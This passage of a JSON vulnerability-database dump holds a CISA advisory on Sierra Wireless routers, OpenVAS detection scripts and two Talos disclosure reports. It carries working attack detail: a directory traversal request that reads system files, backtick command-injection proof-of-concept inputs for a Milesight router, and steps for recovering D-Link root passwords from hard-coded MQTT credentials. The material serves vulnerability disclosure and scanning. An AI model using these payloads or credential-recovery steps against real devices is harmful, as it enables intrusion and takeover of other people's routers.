Note](<https://source.sierrawireless.com/resources/airlink/software_reference_docs/release-notes/aleos-4,-d-,4,-d-,9-release-notes/>) is available (login required)\n * GX450, ES450: ALEOS 4.9.4.p09\n * MP70, MP70E, RV50, RV50X, LX40, LX60: ALEOS 4.12 \n * The [ALEOS 4.12.0 Release Note](<https://source.sierrawireless.com/resources/airlink/software_reference_docs/release-notes/aleos-4,-d-,12,-d-,0-release-notes/>) is available (login required)\n\n**\\--------- End Update B Part 2 of 2 ---------**\n\nSierra Wireless recommends users follow the actions outlined below:\n\n * Ensure a strong password is set for the user account. For guidance on password strength, Sierra Wireless recommends the \u201cmemorized secret authenticator\u201d guidelines in NIST SP800-63B.\n * If ALEOS Application Framework (AAF) is enabled, ensure a strong password is set for the AAF User account.\n * If Telnet or SSH is enabled, ensure a strong password is set for the console account.\n\nWhen connecting directly to ACEmanager:\n\n * Use only HTTPS.\n * Utilize an up-to-date, modern web browser with built-in CSS and CSRF protection, such as Chrome, Firefox, or Edge.\n\nFor more information, see the [Sierra Wireless security advisory](<https://source.sierrawireless.com/resources/airlink/software_reference_docs/technical-bulletin/sierra-wireless-technical-bulletin---swi-psa-2019-003/>).\n\nThe following SNORT rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to a Firepower Management Center or Snort.org.\n\nSnort Rules: 48600, 48635, 48614 - 48621, 48747\n\nCISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities. Specifically, users should:\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are [not accessible from the Internet.](<https://www.us-cert.gov/ics/alerts/ICS-ALERT-10-301-01>)\n * Locate control system networks and remote devices behind firewalls and isolate them from the business network.\n * When remote access is required, use secure methods, such as virtual private networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n\nCISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\n\nCISA also provides a section for [control systems security recommended practice](<https://www.us-cert.gov/ics/Recommended-Practices>)s on the ICS webpage on [us-cert.gov](<https://www.us-cert.gov/>). Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.\n\nAdditional mitigation guidance and recommended practices are publicly available on the [ICS webpage on us-cert.gov](<https://www.us-cert.gov/ics>) in the technical information paper, [ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies](<https://www.us-cert.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf>).\n\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to CISA for tracking and correlation against other incidents.\n\nCISA also recommends users take the following measures to protect themselves from social engineering attacks: \n\n * Do not click web links or open unsolicited attachments in email messages. \n * Refer to [Recognizing and Avoiding Email Scams](<https://www.us-cert.gov/sites/default/files/publications/emailscams_0905.pdf>) for more information on avoiding email scams. \n * Refer to [Avoiding Social Engineering and Phishing Attacks](<https://www.us-cert.gov/ncas/tips/ST04-014>) for more information on social engineering attacks.\u200b\u200b\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-23T12:00:00", "type": "ics", "title": "Sierra Wireless AirLink ALEOS (Update B)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4061", "CVE-2018-4062", "CVE-2018-4063", "CVE-2018-4065", "CVE-2018-4066", "CVE-2018-4067", "CVE-2018-4069"], "modified": "2020-04-23T12:00:00", "id": "ICSA-19-122-03", "href": "https://www.cisa.gov/news-events/ics-advisories/icsa-19-122-03", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-07-21T21:34:11", "description": "TP-Link Wi-Fi routers are prone to multiple vulnerabilities.", "cvss3": {}, "published": "2018-11-20T00:00:00", "type": "openvas", "title": "TP-Link Wi-Fi Routers Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-3951", "CVE-2018-3950", "CVE-2018-3948", "CVE-2018-3949"], "modified": "2020-06-26T00:00:00", "id": "OPENVAS:1361412562310141702", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310141702", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# TP-Link TL-R600VPN Multiple Vulnerabilities\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.141702\");\n script_version(\"2020-06-26T10:20:53+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-26 10:20:53 +0000 (Fri, 26 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-11-20 08:40:10 +0700 (Tue, 20 Nov 2018)\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2018-3948\", \"CVE-2018-3949\", \"CVE-2018-3950\", \"CVE-2018-3951\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"TP-Link Wi-Fi Routers Multiple Vulnerabilities\");\n\n script_category(ACT_ATTACK);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_get_http_banner.nasl\");\n script_mandatory_keys(\"Router_Webserver/banner\");\n\n script_tag(name:\"summary\", value:\"TP-Link Wi-Fi routers are prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Sends a crafted HTTP GET request and checks the response.\");\n\n script_tag(name:\"insight\", value:\"TP-Link Wi-Fi routers are prone to multiple vulnerabilities:\n\n - HTTP denial of service (CVE-2018-3948)\n\n - HTTP server information disclosure (CVE-2018-3949)\n\n - HTTP server ping address remote code execution (CVE-2018-3950)\n\n - HTTP server fs directory remote code execution (CVE-2018-3951)\");\n\n script_tag(name:\"affected\", value:\"TP-Link TL-R600VPN HWv3 FRNv1.3.0 and HWv2 FRNv1.2.3.\n\n At least TL-WA890EA with the most recent firmware version is known to be affected. Other devices\n and firmware versions might be affected as well.\");\n\n script_tag(name:\"solution\", value:\"Update to the latest firmware version.\");\n\n script_xref(name:\"URL\", value:\"https://blog.talosintelligence.com/2018/11/tplinkr600.html\");\n script_xref(name:\"URL\", value:\"https://www.tp-link.com/us/products/details/cat-4909_TL-R600VPN.html\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"host_details.inc\");\n\nport = http_get_port(default: 80);\n\nbanner = http_get_remote_headers(port: port);\n\nif (banner && (\"Server: Router Webserver\" >< banner || banner =~ 'Basic realm=\"TP-LINK')) {\n\n files = traversal_files(\"linux\");\n\n headers = make_array(\"Referer\", http_report_vuln_url(port: port, url: \"/Index.htm\", url_only: TRUE));\n\n foreach pattern (keys(files)) {\n file = files[pattern];\n\n url = \"/help/../../../../../../../../../../../../../../../../\" + file;\n\n req = http_get_req(port: port, url: url, add_headers: headers);\n res = http_keepalive_send_recv(port: port, data: req, bodyonly: TRUE);\n\n if (egrep(pattern: pattern, string: res, icase: FALSE)) {\n report = 'It was possible to obtain /' + file + ' with a directory traversal attack: ' + http_report_vuln_url(port: port, url: url, url_only: TRUE) + '\\n\\nResult:\\n' + res;\n security_message(port: port, data: report);\n exit(0);\n }\n }\n\n exit(99);\n}\n\nexit(0);\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:52", "description": "Linksys ESeries are prone to multiple authenticated OS command execution\nvulnerabilities.", "cvss3": {}, "published": "2018-10-30T00:00:00", "type": "openvas", "title": "Linksys ESeries Multiple OS Command Injection Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-3953", "CVE-2018-3954", "CVE-2018-3955"], "modified": "2019-01-28T00:00:00", "id": "OPENVAS:1361412562310141621", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310141621", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_linksys_eseries_cmd_exec_vuln.nasl 13316 2019-01-28 07:41:51Z asteins $\n#\n# Linksys ESeries Multiple OS Command Injection Vulnerabilities\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:linksys:devices\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.141621\");\n script_version(\"$Revision: 13316 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-01-28 08:41:51 +0100 (Mon, 28 Jan 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-10-30 14:57:10 +0700 (Tue, 30 Oct 2018)\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2018-3953\", \"CVE-2018-3954\", \"CVE-2018-3955\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Linksys ESeries Multiple OS Command Injection Vulnerabilities\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_linksys_devices_detect.nasl\");\n script_mandatory_keys(\"Linksys/model\", \"Linksys/firmware\");\n\n script_tag(name:\"summary\", value:\"Linksys ESeries are prone to multiple authenticated OS command execution\nvulnerabilities.\");\n\n script_tag(name:\"insight\", value:\"Specially crafted entries to network configuration information can cause\nexecution of arbitrary system commands, resulting in full control of the device. An attacker can send an\nauthenticated HTTP request to trigger this vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"Linksys E1200 and E2500.\");\n\n script_tag(name:\"solution\", value:\"Update to firmware version 2.0.10 (E1200), 3.0.05 (E2500) or later.\");\n\n script_xref(name:\"URL\", value:\"https://blog.talosintelligence.com/2018/10/vulnerability-spotlight-linksys-eseries.html\");\n script_xref(name:\"URL\", value:\"https://talosintelligence.com/vulnerability_reports/TALOS-2018-0625\");\n script_xref(name:\"URL\", value:\"https://www.linksys.com/us/support-product?pid=01t80000003KRTzAAO\");\n script_xref(name:\"URL\", value:\"https://www.linksys.com/us/support-product?pid=01t80000003KZuNAAW\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!get_app_location(cpe:CPE, nofork:TRUE))\n exit(0);\n\nmodel = get_kb_item(\"Linksys/model\");\nif (!model || (model !~ \"^E(12|25)00\"))\n exit(0);\n\nif (!version = get_kb_item(\"Linksys/firmware\"))\n exit(0);\n\ncheck_vers = str_replace(string: version, find: \" build \", replace: \".\");\n\nif (model == \"E1200\") {\n if (version_is_less(version: check_vers, test_version: \"2.0.10.1\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"2.0.10 build 1\");\n security_message(port: 0, data: report);\n exit(0);\n }\n}\nelse if (model == \"E2500\") {\n if (version_is_less(version: check_vers, test_version: \"3.0.05.2\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"3.0.05 build 2\");\n security_message(port: 0, data: report);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "talos": [{"lastseen": "2023-12-02T16:53:04", "description": "### Summary\n\nAn information disclosure vulnerability exists in the WiFi Smart Mesh functionality of D-LINK DIR-3040 1.13B03. A specially-crafted network request can lead to command execution. An attacker can connect to the MQTT service to trigger this vulnerability.\n\n### Tested Versions\n\nD-LINK DIR-3040 1.13B03\n\n### Product URLs\n\n<https://us.dlink.com/en/products/dir-3040-smart-ac3000-high-power-wi-fi-tri-band-gigabit-router>\n\n### CVSSv3 Score\n\n10.0 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n\n### CWE\n\nCWE-798 - Use of Hard-coded Credentials\n\n### Details\n\nThe DIR-3040 is an AC3000-based wireless internet router.\n\nAn MQTT service exists on the device to provide communications for D-LINK\u2019s Wifi Mesh capabilities. This service is enabled by default and accepts any subscriber on the network as long as they provide valid credentials. However, these credentials are hard-coded and can be obtained one of their shared libraries.\n \n \n From /lib/libapson_mqtt_api.so:\n .rodata:0000291C\t00000006\tC\tapson // Username\n .rodata:00002924\t00000006\tC\twrsdd // Password\n \n\nThe MQTT payload data contains specific information needed by secondary routers and extenders to configure the mesh network. In particular, the root password of the primary device is propagated amongst this data to these secondary nodes. Typical traffic looks like the following:\n \n \n TOPIC: master\n PAYLOAD:\n 00000000: 00 00 00 07 00 01 34 0A 33 8F 69 05 00 00 01 00 ......4.3.i.....\n 00000010: 00 00 03 11 A3 30 41 8D A1 3C 1A F2 C1 73 2B 27 .....0A..<...s+'\n 00000020: 5B 5A 16 C4 3C 8E F6 68 C2 D6 B2 A8 39 EF AF E3 [Z..<..h....9...\n 00000030: CF F9 BD 7E E0 0D 2E 4E 3D CF 2C 14 10 6C 9C 6C ...~...N=.,..l.l\n 00000040: 71 48 47 6C 23 F2 F0 E5 CD 50 F9 84 1F F3 3C 49 qHGl#....P....<I\n <snipped for brevity>\n 000002C0: 0B D9 26 37 E9 42 DE A8 2C 65 4B A9 7C B2 FE EF ..&7.B..,eK.|...\n 000002D0: B5 E3 CF 81 C2 E4 8A 05 F4 BF AC 46 9D 4D 5B 40 ...........F.M[@\n 000002E0: 19 B1 F1 32 DD 2E 04 B8 6B 9A 54 4E FB 52 69 7D ...2....k.TN.Ri}\n 000002F0: 6C 0F 4D 99 80 26 2F 83 5C 68 69 F7 A1 C8 02 07 l.M..&/.\\hi.....\n 00000300: 75 E8 FA A6 8C 54 02 42 B4 C8 C4 69 CC DD 3A 2D u....T.B...i..:-\n 00000310: 70 5C 3E 52 2E F2 45 8B 66 F2 F0 5F 61 B0 D6 DC p\\>R..E.f.._a...\n 00000320: 5F 61 44 50 25 A7 61 4E 2C 54 D5 44 65 62 2E 8C _aDP%.aN,T.Deb..\n 00000330: D2 E6 DE EF ....\n \n\nThe payload data is serialized as Protocol Buffer data. While the plaintext Protocol Buffer schema is not available, it is not required to deserialize useful information from many of the published MQTT payloads. However, the more sensitive payloads (such as the one above that contains the root password on the device) are encrypted via AES (with a NULL initialization vector).\n\nThe information needed to generate a valid key for decrypting the payload resides within the payload itself. In each encrypted payload, the publisher\u2019s MAC address is listed at offsets 0x6-&gt;0xB. As we can see in the `/usr/bin/apsond` binary on the target, the key is generated by using the MAC address in a `snprintf()` call using the following format string:\n \n \n 0040a5fc snprintf(&$key, 0x10, \"%02xw%02Xr%02xs%02Xd%02Xd%02x\", zx.d(*(mqtt_payload + 7)), zx.d(*(mqtt_payload + 9)), zx.d(*(mqtt_payload + 0xb)), zx.d(*(mqtt_payload + 6)), zx.d(*(mqtt_payload + 8)), zx.d(*(mqtt_payload + 0xa)))\n \n\nThe characters \u2018wrsdd\u2019 are also inserted between each byte. (Note that the 5th byte of the MAC address is omitted due to the null terminator). Which is essentially:\n \n \n key = (\"%sw%sr%ss%sd%sd\\x00\" % (macBytes[1], macBytes[3].upper(), macBytes[5], macBytes[0].upper(), macBytes[2].upper())).encode('utf-8')\n \n\nUsing the information above, we can see the MAC address is `34:0A:33:8F:69:05`. This can be used to generate the following key for this particular payload:\n \n \n Key:\n 00000000: 30 61 77 38 46 72 30 35 73 33 34 64 33 33 64 00 0aw8Fr05s34d33d.\n \n\nOnce we have the key, we can decrypt the traffic above:\n \n \n Decrypted:\n 00000000: 08 9C 9C B8 75 12 0F 2F 74 6D 70 2F 73 62 64 5F ....u../tmp/sbd_\n 00000010: 63 6F 6E 66 69 67 1A 27 08 FD C1 EF 86 FA FF FF config.'........\n 00000020: FF FF 01 12 03 62 72 30 1A 0B 6D 65 73 68 5F 39 .....br0..mesh_9\n 00000030: 33 38 31 42 35 22 08 44 41 50 2D 31 38 32 30 22 381B5\".DAP-1820\"\n 00000040: D4 02 08 DD F5 B4 D1 05 10 04 1A 4F 08 A8 A5 BE ...........O....\n <snipped for brevity>\n 000002C0: 2A 0E 6E 74 70 31 2E 64 6C 69 6E 6B 2E 63 6F 6D *.ntp1.dlink.com\n 000002D0: 6A 3F 08 B4 E5 D3 CC 06 1A 08 50 61 73 73 77 30 j?........Passw0\n 000002E0: 72 64 22 19 68 74 74 70 3A 2F 2F 64 6C 69 6E 6B rd\".http://dlink\n 000002F0: 72 6F 75 74 65 72 2E 6C 6F 63 61 6C 2F 30 01 3A router.local/0.:\n 00000300: 10 41 6D 65 72 69 63 61 2F 4E 65 77 5F 59 6F 72 .America/New_Yor\n 00000310: 6B k\n \n\nThough unecessary for this attack, we could even go a step further and decode the protocol buffer data:\n \n \n 13 <chunk> = message:\n 1 <varint> = 1771369140\n 3 <chunk> = \"Passw0rd\" // Here is our root password\n 4 <chunk> = \"http://dlinkrouter.local/\"\n 6 <varint> = 1\n 7 <chunk> = \"America/New_York\"\n \n\nAn attacker could then use this information to login to the web-based administrator console or append `@twsz2018` to the password as in the following example:\n \n \n Passw0rd@twsz2018\n \n\nto login to the telnet/libcli service on the DIR-3040 (as seen in TALOS-2021-1284/CVE-2021-21819) or other devices on the mesh network (such as the DAP-1820 which will give you a root shell once the telnet service is started in the same manner as described in TALOS-2021-1285/CVE-2021-21820).\n\nAn attacker can also take advantage of other useful functions within the mesh network by simply publishing the appropriate payloads to the correct topic. These functions provide many remote capabilities such as rebooting any device on the mesh network and/or kicking out devices within the mesh completely.\n\n### Timeline\n\n2021-08-24 - Vendor Disclosure \n2021-09-23 - Public Release\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-23T00:00:00", "type": "talos", "title": "D-LINK DIR-3040 WiFi Smart Mesh information disclosure vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21819", "CVE-2021-21820", "CVE-2021-21913"], "modified": "2021-09-23T00:00:00", "id": "TALOS-2021-1361", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1361", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-11-08T19:04:35", "description": "# Talos Vulnerability Report\n\n### TALOS-2023-1723\n\n## Milesight UR32L zebra vlan_name OS command injection vulnerabilities\n\n##### July 6, 2023\n\n##### CVE Number\n\nCVE-2023-25582,CVE-2023-25583\n\n##### SUMMARY\n\nTwo OS command injection vulnerabilities exist in the zebra vlan_name functionality of Milesight UR32L v32.3.0.5. A specially crafted network request can lead to command execution. An attacker can send a network request to trigger these vulnerabilities.\n\n##### CONFIRMED VULNERABLE VERSIONS\n\nThe versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.\n\nMilesight UR32L v32.3.0.5\n\n##### PRODUCT URLS\n\nUR32L - <https://www.milesight-iot.com/cellular/router/ur32l/>\n\n##### CVSSv3 SCORE\n\n7.2 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n\n##### CWE\n\nCWE-78 - Improper Neutralization of Special Elements used in an OS Command (\u2018OS Command Injection\u2019)\n\n##### DETAILS\n\nThe Milesight UR32L is an industrial cellular router. The router features include support for multiple VPNs, a router console shell, firewall and many others.\n\nThe router offers telnet and sshd services. Both, when provided with the correct credentials, will allow access to the Router console. This is an interactive shell to modify the router settings.\n\nHere is the prompt after the login:\n \n \n *** TERMINFO:/etc/terminfo TERM:linux *****\n -- model:UR32L,sn:<redacted>,hwver:0300 partnumber:<redacted>--\n \n -------------------------------------------------------------------------\n Product Model : UR32L\n Firmware Version : 32.3.0.5\n -------------------------------------------------------------------------\n \n ROUTER> \n \n\nThe service has several functionalities. The number of functionalities depends on the user privileges. Indeed, the admin user can access the `enable` command, which will allow access to a highly privileged command menu:\n \n \n ROUTER> enable \n ROUTER# \n cellular-gps-dev\n clear Reset functions\n configure Configuration from vty interface\n copy Copy from one file to another\n core Set debug level\n debug Debugging functions (see also 'undebug')\n disable Turn off privileged mode command\n enable Turn on privileged mode command\n end End current mode and change to enable mode\n exit Exit current mode and down to previous mode\n list Print command list\n modbus-master\n no Negate a command or set its defaults\n ping Send echo messages\n quit Exit current mode and down to previous mode\n reload Halt and perform a cold restart\n show Show running system information\n ssh Open an ssh connection\n telnet Open a telnet connection\n terminal Set terminal line parameters\n test Test\n traceroute Trace route to destination\n undebug Disable debugging functions (see also 'debug')\n write Write running configuration to memory, network, or terminal\n \n\nIssuing the `configure terminal` command permits access to the `vlan <VLAN ID>` command that allows configuration of a vlan. Several configurations are available for the vlan, one of which is the command `name <vlan name>`, used to add a name to the vlan and set up a network interface accordingly.\n\nAn example of using this functionality is the following one:\n \n \n ROUTER> enable \n ROUTER# configure terminal \n ROUTER(config)# vlan 1000\n ROUTER(config-switch)# name new\n \n\nThis will add the network interface named `new` and assign to it the vlan id 1000. The function responsible for managing the `name <vlan name>` command is the `zebra`\u2019s `vlan_name` function. This function is vulnerable to two OS command injections through the `<vlan name>` field. Following are the details for the two vulnerabilities.\n\n#### CVE-2023-25582 - replace vlan name\n\nFollowing is the relevant portion of the `vlan_name` function that manages an already-existing vlan configuration:\n \n \n void vlan_name(undefined4 param_1,int vty,undefined4 argc,char **argv)\n \n {\n [... variable declaration ...]\n \n [...]\n config_switch_info = vty->config_switch_info;\n does_interfafce_exist = (switch_node *)check_ifname_exist(*argv);\n if (does_interfafce_exist == (switch_node *)0x0) {\n pthread_mutex_lock((pthread_mutex_t *)switch_if_lock);\n for (switch_node_iterator = switch_if; switch_node_iterator != (switch_node *)0x0;\n switch_node_iterator = switch_node_iterator->next) { [1]\n if (switch_node_iterator->vlan_id == config_switch_info->current_vlan) { [2]\n interface_name = switch_node_iterator->interface_name;\n if (interface_name != (char *)0x0) {\n [... delete old interface ...]\n }\n new_interface_name = zstrdup(1,*argv);\n switch_node_iterator->interface_name = new_interface_name;\n [...]\n snprintf(shell_command,100,\"ip link add link %s name %s type vlan id %d\",\"eth0\",\n new_interface_name,switch_node_iterator->vlan_id); [3]\n system(shell_command); [4]\n [...]\n }\n }\n }\n [...]\n }\n [...]\n }\n \n\nThe `vlan_name` function iterates at `[1]` through all the registered vlan configurations. If one of the existing vlan configurations matches the selected vlan id with the already registered one, at `[2]`, eventually the code at `[3]` will be reached. At `[3]` the `\"ip link add link eth0 name <provided interface name> type vlan id <provided vlan id>\"` string is composed and then executed through the `system` function at `[4]`. Because no checks regarding the interface provided is perfomed, this `vlan_name`\u2019s branch is vulnerable to an OS command injection vulnerability.\n\n#### Exploit Proof of Concept\n\nFollowing is a POC triggering a reboot of the system through the command injection exposed above:\n \n \n *** TERMINFO:/etc/terminfo TERM:linux *****\n -- model:UR32L,sn:<redacted>,hwver:0300 partnumber:<redacted>--\n \n -------------------------------------------------------------------------\n Product Model : UR32L\n Firmware Version : 32.3.0.5\n -------------------------------------------------------------------------\n \n ROUTER> enable \n ROUTER# configure terminal \n ROUTER(config)# vlan 1000\n ROUTER(config-switch)# name new\n ROUTER(config-switch)# name old`reboot`\n ROUTER(config-switch)# Connection closed by foreign host.\n \n\nThe `Connection closed by foreign host.` is the consequence of the device rebooting.\n\n#### CVE-2023-25583 - new vlan name\n\nFollowing the relevant portion of the `vlan_name` function that manages a new vlan configuration:\n \n \n void vlan_name(undefined4 param_1,int vty,undefined4 argc,char **argv)\n \n {\n [... variable declaration ...]\n \n [...]\n config_switch_info = vty->config_switch_info;\n does_interfafce_exist = (switch_node *)check_ifname_exist(*argv);\n if (does_interfafce_exist == (switch_node *)0x0) {\n pthread_mutex_lock((pthread_mutex_t *)switch_if_lock);\n for (switch_node_iterator = switch_if; switch_node_iterator != (switch_node *)0x0;\n switch_node_iterator = switch_node_iterator->next) { [5]\n [...]\n }\n [...]\n if (switch_node_iterator == (switch_node *)0x0) {\n new_switch = (switch_node *)zcalloc(1,0xc);\n if (new_switch == (switch_node *)0x0) {\n [...]\n }\n else {\n interface_name = *argv;\n new_switch->vlan_id = config_switch_info->current_vlan;\n interface_name_copy = zstrdup(1,interface_name);\n new_switch->interface_name = interface_name_copy;\n if (interface_name_copy != 0) {\n [...]\n snprintf(shell_command,100,\"ip link del %s\",new_switch->interface_name); [6]\n system(shell_command); [7]\n [...]\n }\n [...]\n }\n [...]\n }\n }\n [...]\n }\n \n\nThe `vlan_name` function iterates at `[5]` through all the registered vlan configurations. If the selected vlan id is not in the in the list, the code at `[6]` will eventually be executed. At `[6]` the `\"ip link del <provided interface name>\"` string is composed and then executed at `[7]` through the `system` function. Because no checks regarding the interface provided are perfomed, this `vlan_name`\u2019s branch is vulnerable to an OS command injection vulnerability.\n\n#### Exploit Proof of Concept\n\nFollowing is a POC triggering a reboot of the system through the command injection exposed above:\n \n \n *** TERMINFO:/etc/terminfo TERM:linux *****\n -- model:UR32L,sn:<redacted>,hwver:0300 partnumber:<redacted>--\n \n -------------------------------------------------------------------------\n Product Model : UR32L\n Firmware Version : 32.3.0.5\n -------------------------------------------------------------------------\n \n ROUTER> enable \n ROUTER# configure terminal \n ROUTER(config)# vlan 100\n ROUTER(config-switch)# name new`reboot`\n ROUTER(config-switch)# Connection closed by foreign host.\n \n\nThe `Connection closed by foreign host.` is the consequence of the device rebooting.\n\n##### VENDOR RESPONSE\n\nSince the maintainer of this software did not release a patch during the 90 day window specified in our policy, we have now decided to release the information regarding this vulnerability, to make users of the software aware of this problem. See Cisco\u2019s Coordinated Vulnerability Disclosure Policy for more information: https://tools.cisco.com/security/center/resources/vendor_vulnerability_policy.html\n\n##### TIMELINE\n\n2023-02-14 - Initial Vendor Contact \n2023-02-21 - Vendor Disclosure \n2023-07-06 - Public Release\n\n##### Credit\n\nDiscovered by Francesco Benvenuto of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2023-1702\n\nPrevious Report\n\nTALOS-2023-1715\n", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 